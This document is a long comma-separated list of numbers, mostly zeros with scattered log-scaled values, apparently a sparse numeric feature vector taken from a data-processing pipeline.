0.0, 0.0, 0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.941642422609304, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 1.7412592803704001, 0.0, 0.0, 0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 7.052721049232323, 0.0, 2.302585092994046, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 5.58914919554, 0.0, 0.0, 0.0, 0.0, 5.1298987149230735, 0, 0.0, 0.0, 3.4825185607408002, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.70805020110221, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9318256327243257, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.995948045406804, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.6888794541139363, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 1.791759469228055, 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 2.550898738446989, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 3.7369991058576035, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 5.679743138077019, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 5.952096120109145, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.783640596221253, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.499809670330265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 6.6052979209482015, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 5.952096120109145, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.0301047650807, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.367295829986474, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 5.375278407684164, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0, 0, 3.295836866004329, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.581130849408909, 0.0, 0, 0.0, 2.995732273553991, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.0841946160253872, 0.0, 2.4849066497880004, 0.0, 0.0, 5.375278407684164, 0.0, 0.0, 0.0, 5.8377304471659395, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.518263445217986, 0.0, 3.295836866004329, 2.9444389791664403, 0.0, 0.0, 0.0, 5.030104765080701, 0, 0, 0.0, 0.0, 2.5649493574615367, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 4.330733340286331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 